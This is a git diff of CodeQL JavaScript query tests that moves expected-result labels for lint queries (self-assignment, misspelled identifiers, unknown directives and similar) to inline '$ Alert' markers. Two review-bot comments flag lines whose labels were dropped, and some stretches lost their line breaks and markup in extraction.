@@ -1 +1,2 @@ -Expressions/MisspelledIdentifier.ql \ No newline at end of file +query: Expressions/MisspelledIdentifier.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js index 101c6b360b48..5016873b6a59 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js @@ -1,43 +1,40 @@ // use of .length to prime the query a.length; -// NOT OK -for (var i=0; i - errorMessage; + errorMessage; // $ Alert } function foo() { var thisHander; - thisHandler.foo1; - thisHandler.foo2; - thisHandler.foo3; - thisHandler.foo4; - thisHandler.foo5; - thisHandler.foo6; - thisHandler.foo7; - thisHandler.foo8; + thisHandler.foo1; // $ Alert + thisHandler.foo2; // $ Alert + thisHandler.foo3; // $ Alert + thisHandler.foo4; // $ Alert + thisHandler.foo5; // $ Alert + thisHandler.foo6; // $ Alert + thisHandler.foo7; // $ Alert + thisHandler.foo8; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref b/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref index f7b19a84df53..f8401e03f0d5 100644 --- a/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref +++ b/javascript/ql/test/query-tests/Expressions/RedundantExpression/RedundantExpression.qlref @@ -1 +1,2 @@ -Expressions/RedundantExpression.ql \ No newline at end of file +query: Expressions/RedundantExpression.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js b/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js index b556d518eca4..25db749dde38 100644 
--- a/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js +++ b/javascript/ql/test/query-tests/Expressions/RedundantExpression/tst.js @@ -1,11 +1,11 @@ -(x + x) / 2; -e[i] - e[i]; -(x + y)/(x + y); -window.height - window.height; -x == 23 || x == 23; +(x + x) / 2; // $ Alert +e[i] - e[i]; // $ Alert +(x + y)/(x + y); // $ Alert +window.height - window.height; // $ Alert +x == 23 || x == 23; // $ Alert x & x; // this may actually be OK, but it's not good style -pop() && pop(); +pop() && pop(); // $ Alert -foo[bar++] && foo[bar++] // OK \ No newline at end of file +foo[bar++] && foo[bar++] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected index e97b3e8fe783..fcdf350a9268 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected @@ -1,5 +1,5 @@ | jsdoc.js:9:5:9:19 | this.y = this.y | This expression assigns property y to itself. | | jsdoc.js:11:5:11:23 | this.arg = this.arg | This expression assigns property arg to itself. | -| tst.js:5:2:5:14 | width = width | This expression assigns variable width to itself. | -| tst.js:24:1:24:19 | array[1] = array[1] | This expression assigns element 1 to itself. | -| tst.js:27:1:27:9 | o.x = o.x | This expression assigns property x to itself. | +| tst.js:4:2:4:14 | width = width | This expression assigns variable width to itself. | +| tst.js:22:1:22:19 | array[1] = array[1] | This expression assigns element 1 to itself. | +| tst.js:24:1:24:9 | o.x = o.x | This expression assigns property x to itself. | diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref index 8956117be70e..592467638457 100644 
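Review bot: In the RedundantExpression/tst.js hunk, the context line `x & x; // this may actually be OK, but it's not good style` is the only statement left with a free-text verdict, so after the switch to inline expectations it no longer records whether the query is expected to report it. If RedundantExpression.ql flags the line, it should read `x & x; // $ Alert - may actually be OK, but not good style`; if it does not, `x & x; // OK - not flagged, though not good style` would match the `// OK - …` form this commit uses for other intended negatives. The query's result list is not part of this hunk, so which of the two applies could not be confirmed from here.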
--- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.qlref @@ -1 +1,2 @@ -Expressions/SelfAssignment.ql \ No newline at end of file +query: Expressions/SelfAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js b/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js index 03bfc0b5573b..d72b3ec65f94 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/jsdoc.js @@ -6,8 +6,8 @@ class C extends Q { */ this.x = this.x; // OK - documentation - this.y = this.y; // NOT OK + this.y = this.y; // $ Alert - this.arg = this.arg; // NOT OK + this.arg = this.arg; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js b/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js index 246651e37a67..36eb815fc2dd 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/tst.js @@ -1,8 +1,7 @@ function Rectangle(x, y, width, height) { this.x = x; this.y = y; - // NOT OK - width = width; + width = width; // $ Alert this.height = height; } @@ -15,18 +14,16 @@ Rectangle.prototype = { this.width = a/this.height; }, foo: function() { - // OK + this.area = this.area; } }; -// NOT OK -array[1] = array[1]; +array[1] = array[1]; // $ Alert + +o.x = o.x; // $ Alert -// NOT OK -o.x = o.x; -// OK document.innerHTML = document.innerHTML; class Point { @@ -43,7 +40,7 @@ class Point { this.y = 0; } foo() { - // OK + this.dist = this.dist; } } diff --git a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref index 1c2d75cde4ad..609eb065ea75 100644 
--- a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref +++ b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/ShiftOutOfRange.qlref @@ -1 +1,2 @@ -Expressions/ShiftOutOfRange.ql \ No newline at end of file +query: Expressions/ShiftOutOfRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js index a8cedd993b2a..1ee755fd46b9 100644 --- a/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ShiftOutOfRange/tst.js @@ -1,2 +1,2 @@ -var n = 1<<40; // NOT OK -var n2 = BigInt(1) << 40n; // OK +var n = 1<<40; // $ Alert +var n2 = BigInt(1) << 40n; diff --git a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref index a3772e3b4dd1..9f842782a35b 100644 --- a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref +++ b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/StringInsteadOfRegex.qlref @@ -1 +1,2 @@ -Expressions/StringInsteadOfRegex.ql \ No newline at end of file +query: Expressions/StringInsteadOfRegex.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js index 685b56525e06..79557ef1563e 100644 --- a/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js +++ b/javascript/ql/test/query-tests/Expressions/StringInsteadOfRegex/tst.js 
@@ -1,46 +1,46 @@ function NOT_OK() { // regex-like strings - "".replace("/foo/i", ""); - "".replace("/^foo/", ""); - "".replace("/foo$/", ""); - "".replace("^foo$", ""); - "".replace("\s", ""); - "".replace("foo\sbar", ""); - "".replace("foo\s", ""); - "".replace("\sbar", ""); - "".replace("foo\[bar", ""); - "".replace("\[", ""); - "".replace("\]", ""); - "".replace("\(", ""); - "".replace("\)", ""); - "".replace("\*", ""); - "".replace("\+", ""); - "".replace("\?", ""); - "".replace("\{", ""); - "".replace("\}", ""); - "".replace("\|", ""); - "".replace("\^", ""); - "".replace("\$", ""); - "".replace("[a-zA-Z123]+", ""); - "".replace("[a-z]+", ""); - "".replace("[a-z]*", ""); - "".replace("[0-9_-]+", ""); - "".replace("[^a-z]+", ""); - "".replace("foo[^a-z]+bar", ""); + "".replace("/foo/i", ""); // $ Alert + "".replace("/^foo/", ""); // $ Alert + "".replace("/foo$/", ""); // $ Alert + "".replace("^foo$", ""); // $ Alert + "".replace("\s", ""); // $ Alert + "".replace("foo\sbar", ""); // $ Alert + "".replace("foo\s", ""); // $ Alert + "".replace("\sbar", ""); // $ Alert + "".replace("foo\[bar", ""); // $ Alert + "".replace("\[", ""); // $ Alert + "".replace("\]", ""); // $ Alert + "".replace("\(", ""); // $ Alert + "".replace("\)", ""); // $ Alert + "".replace("\*", ""); // $ Alert + "".replace("\+", ""); // $ Alert + "".replace("\?", ""); // $ Alert + "".replace("\{", ""); // $ Alert + "".replace("\}", ""); // $ Alert + "".replace("\|", ""); // $ Alert + "".replace("\^", ""); // $ Alert + "".replace("\$", ""); // $ Alert + "".replace("[a-zA-Z123]+", ""); // $ Alert + "".replace("[a-z]+", ""); // $ Alert + "".replace("[a-z]*", ""); // $ Alert + "".replace("[0-9_-]+", ""); // $ Alert + "".replace("[^a-z]+", ""); // $ Alert + "".replace("foo[^a-z]+bar", ""); // $ Alert // shapes - f().replace("/foo/i", x); + f().replace("/foo/i", x); // $ Alert var v1 = "/foo/i"; - f().replace(v1, x); - o.p.q.replace("/foo/i", x); + f().replace(v1, x); // $ Alert + 
o.p.q.replace("/foo/i", x); // $ Alert // examples in the wild - "".replace('^\s+|\s+$', ''); - "".replace("[^a-zA-Z0-9 ]+", ""); + "".replace('^\s+|\s+$', ''); // $ Alert + "".replace("[^a-zA-Z0-9 ]+", ""); // $ Alert // non-replace methods - "".split("/foo/i"); - "".split("/foo/i", x); + "".split("/foo/i"); // $ Alert + "".split("/foo/i", x); // $ Alert } function OK() { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected index 990eaa36148f..1ce095b51938 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected @@ -2,5 +2,5 @@ | namespace.ts:23:1:23:3 | g() | Callee is not a function: it has type object. | | optional-chaining.js:3:5:3:7 | a() | Callee is not a function: it has type null. | | optional-chaining.js:7:5:7:7 | b() | Callee is not a function: it has type undefined. | -| super.js:11:5:11:11 | super() | Callee is not a function: it has type number. | +| super.js:10:5:10:11 | super() | Callee is not a function: it has type number. | | unreachable-code.js:5:9:5:11 | f() | Callee is not a function: it has type undefined. | diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js index dba61f9ff1d3..bdd3414222ea 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js 
@@ -8,6 +8,6 @@ function processResponse(response) { if (error) throw error; } else { - error("Unexpected response status " + response.status); + error("Unexpected response status " + response.status); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref index 23c91fb3f00d..2ef227101966 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref @@ -1 +1,2 @@ -Expressions/SuspiciousInvocation.ql \ No newline at end of file +query: Expressions/SuspiciousInvocation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js index dfc03927130f..db14aca9ea65 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js @@ -1,12 +1,12 @@ function foo() { var f; eval("f = alert"); - f("Hi"); // OK: initialised by eval + f("Hi"); // OK - initialised by eval } function bar() { var g; - g(); // NOT OK, but not currently flagged + g(); // $ MISSING: Alert eval("g = alert"); } @@ -15,10 +15,10 @@ function baz() { function inner(b) { if (b) { inner(false); - g(); // OK: initialised by eval below + g(); // OK - initialised by eval below } else { eval("g = alert"); } } inner(true); -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts index c1060e342d37..f03a7ca7150d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts 
+++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts @@ -5,20 +5,20 @@ namespace f { export function inner() {} } -f(); // OK -f.inner(); // OK +f(); +f.inner(); class C {} namespace C { export function inner() {} } -new C(); // OK -C.inner(); // OK +new C(); +C.inner(); namespace g { export function inner() {} } -g(); // NOT OK -g.inner(); // OK +g(); // $ Alert +g.inner(); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js index 9be73a4dde52..acbfddcf53c7 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js @@ -1,9 +1,9 @@ (function(){ var a = null; - a(); + a(); // $ Alert a?.(); var b = undefined; - b(); + b(); // $ Alert b?.(); }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js index 17152efab227..69754fb386dc 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js @@ -1,13 +1,12 @@ class A extends null { constructor() { - // OK: calls `Function.prototype` + // OK - calls `Function.prototype` super(); } } class B extends 42 { constructor() { - // NOT OK - super(); + super(); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js index b8b89198c46f..b3bd335ede66 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js 
@@ -2,7 +2,7 @@ var getF = function(){} var f = getF(); (function () { - f(); + f(); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js index 4d9aaf9e67dc..5339b6e8903d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js @@ -1,7 +1,7 @@ function f() { var result; res = computeInterestingResult(); - return result.value; + return result.value; // $ Alert } (function(_window) { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref index df93925770dd..26f1debdfefe 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref @@ -1 +1,2 @@ -Expressions/SuspiciousPropAccess.ql \ No newline at end of file +query: Expressions/SuspiciousPropAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts index 5b552a15bf2c..0375d6e6327c 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts @@ -1,5 +1,5 @@ import C from "./export_equals"; function f() { - C.staticMethod(); // OK + C.staticMethod(); } 
diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts index 5c6d9b12d92c..a9f9b5b9ed9a 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts @@ -1,5 +1,5 @@ import { importExport } from "./export_import"; function test() { - let f = importExport.prop; // OK + let f = importExport.prop; } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js index fa6003ad7959..f755be1ded02 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js @@ -1,9 +1,9 @@ (function(){ var a = null; - a.p; + a.p; // $ Alert a?.p; var b = undefined; - b.p; + b.p; // $ Alert b?.p; }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js index 114fbec93fb4..32e703fc7a4d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js @@ -29,5 +29,5 @@ }); (function(){ - function a(){return null;} a(1)[0]; + function a(){return null;} a(1)[0]; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts index 7cbadb3b5b0a..93ac4836644c 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts 
@@ -16,9 +16,9 @@ C.foo = 3; namespace N { var x; - x.p = 5; + x.p = 5; // $ Alert - var q = M.Color.Blue; // OK + var q = M.Color.Blue; namespace M { export const enum Color { Blue } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts index b4c6980c053c..e3de0b44305e 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts @@ -8,10 +8,10 @@ function f(x: Base[]) { if (x) { y = x[0] as Sub; } - y.field; // OK + y.field; var z = null as Sub; - z.field; // NOT OK + z.field; // $ Alert } f([new Sub()]); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts index bd677367a9bf..7f0d7be210f7 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts @@ -1,6 +1,6 @@ function f() { - var y: typeof N.x // OK - var z = N.x // NOT OK (currently missed due to const enum workaround) + var y: typeof N.x + var z = N.x // $ MISSING: Alert - missed due to const enum workaround namespace N { export var x = 45 } diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref index 6d28236a2296..bcdab46394a1 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref 
@@ -1 +1,2 @@ -Expressions/UnboundEventHandlerReceiver.ql \ No newline at end of file +query: Expressions/UnboundEventHandlerReceiver.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js index 27409330cd38..f6039b673435 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js @@ -5,7 +5,7 @@ class Component0 extends React.Component { render() { return
    -
    // OK +
    } @@ -24,20 +24,20 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
    -
    // NOT OK -
    // NOT OK -
    // NOT OK -
    // OK -
    // OK -
    // OK -
    // OK -
    this.unbound_butInvokedSafely(e)}/> // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    +
    +
    +
    +
    this.unbound_butInvokedSafely(e)}/> +
    +
    +
    +
    +
    +
    } @@ -125,7 +125,7 @@ class Component2 extends React.Component { render() { return
    -
    // OK +
    ; } @@ -139,7 +139,7 @@ class Component3 extends React.Component { render() { return
    -
    // OK +
    } @@ -159,7 +159,7 @@ class Component4 extends React.Component { render() { return
    -
    // OK +
    } @@ -177,7 +177,7 @@ class Component5 extends React.Component { render() { return
    -
    // OK +
    } diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref index 5a9a25e11186..d4887864cb1d 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref @@ -1 +1,2 @@ -Expressions/UnclearOperatorPrecedence.ql \ No newline at end of file +query: Expressions/UnclearOperatorPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js index 5490b0b4232a..9aa369d69b21 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js @@ -1,10 +1,10 @@ -x.f() & 0x0A != 0; // NOT OK -x.f() & (0x0A != 0); // OK -x.f() & 0x0A != 0; // OK -x.f() & 0x0A!=0; // OK +x.f() & 0x0A != 0; // $ Alert +x.f() & (0x0A != 0); +x.f() & 0x0A != 0; +x.f() & 0x0A!=0; -x !== y & 1; // NOT OK +x !== y & 1; // $ Alert -x > 0 & x < 10; // OK +x > 0 & x < 10; -a&b==c; // NOT OK +a&b==c; // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js index 800b7b08df2c..d39838870c81 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js @@ -1 +1 @@ -a&b==c; // OK (minified file) +a&b==c; // OK - minified file 
diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html index 87f969c3e179..03ac0651186e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html @@ -1,6 +1,6 @@ - - - + + + diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index 0645f8821a1d..e86b7b9d95bc 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js 
@@ -1,51 +1,51 @@ -"use foo"; // NOT OK -"use strict"; // NOT OK +"use foo"; // $ Alert +"use strict"; function bad() { - "'use strict'"; // NOT OK - "use strict;"; // NOT OK - "'use strict';"; // NOT OK - "'use strict;'"; // NOT OK - "use-strict"; // NOT OK - "use_strict"; // NOT OK - "uses strict"; // NOT OK - "use struct;" // NOT OK - "Use Strict"; // NOT OK - "use bar"; // NOT OK + "'use strict'"; // $ Alert + "use strict;"; // $ Alert + "'use strict';"; // $ Alert + "'use strict;'"; // $ Alert + "use-strict"; // $ Alert + "use_strict"; // $ Alert + "uses strict"; // $ Alert + "use struct;" // $ Alert + "Use Strict"; // $ Alert + "use bar"; // $ Alert } function ignored() { var x = 42; - "use baz"; // OK: not a directive, positionally + "use baz"; // OK - not a directive, positionally } function good() { - "use strict"; // OK - "use asm"; // OK - "use babel"; // OK - "use 6to5"; // OK - "format cjs" // OK - "format esm"; // OK - "format global"; // OK - "format register"; // OK - "ngInject"; // OK - "ngNoInject"; // OK - "deps foo"; // OK - "deps bar"; // OK - "use server"; // OK - "use client"; // OK + "use strict"; + "use asm"; + "use babel"; + "use 6to5"; + "format cjs" + "format esm"; + "format global"; + "format register"; + "ngInject"; + "ngNoInject"; + "deps foo"; + "deps bar"; + "use server"; + "use client"; } function data() { - "[0, 0, 0];"; // NOT OK - "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // NOT OK + "[0, 0, 0];"; // $ Alert + "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // $ Alert } function yui() { - "foo:nomunge"; // OK - "bar:nomunge, baz:nomunge,qux:nomunge"; // OK - ":nomunge"; // NOT OK - "foo(), bar, baz:nomunge"; // NOT OK + "foo:nomunge"; + "bar:nomunge, baz:nomunge,qux:nomunge"; + ":nomunge"; // $ Alert + "foo(), bar, baz:nomunge"; // $ Alert } function babel_typeof(obj) { 
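Review bot: The top-level `"use strict"; // NOT OK` at the start of this hunk becomes a bare `"use strict";`, so the old label is dropped with neither `// $ Alert` nor `// $ MISSING: Alert`. The same happens to `})(Mod2 || (Mod2 = {})); // NOT OK` in UnneededDefensiveProgramming/global-module-definition.js. With inline expectations an unannotated line asserts that no result is expected, so the next maintainer will read it as a deliberate "OK". If the query is known to miss these lines, record that the way typeoftype.ts does, e.g. `"use strict"; // $ MISSING: Alert`; if the old label was simply stale, a short `// OK - <reason>` would say so. The diff alone does not show which case applies.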
diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref
index 2cd60100c59e..0fa5fe40535d 100644
--- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref
+++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref
@@ -1 +1,2 @@
-Expressions/UnknownDirective.ql
\ No newline at end of file
+query: Expressions/UnknownDirective.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref
index 13b0e2a181cb..22ce4796bb35 100644
--- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref
+++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref
@@ -1 +1,2 @@
-Expressions/HeterogeneousComparison.ql
\ No newline at end of file
+query: Expressions/HeterogeneousComparison.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref
index 13c05f1e74bd..98fc974827b4 100644
--- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref
+++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref
@@ -1 +1,2 @@
-Expressions/UnneededDefensiveProgramming.ql
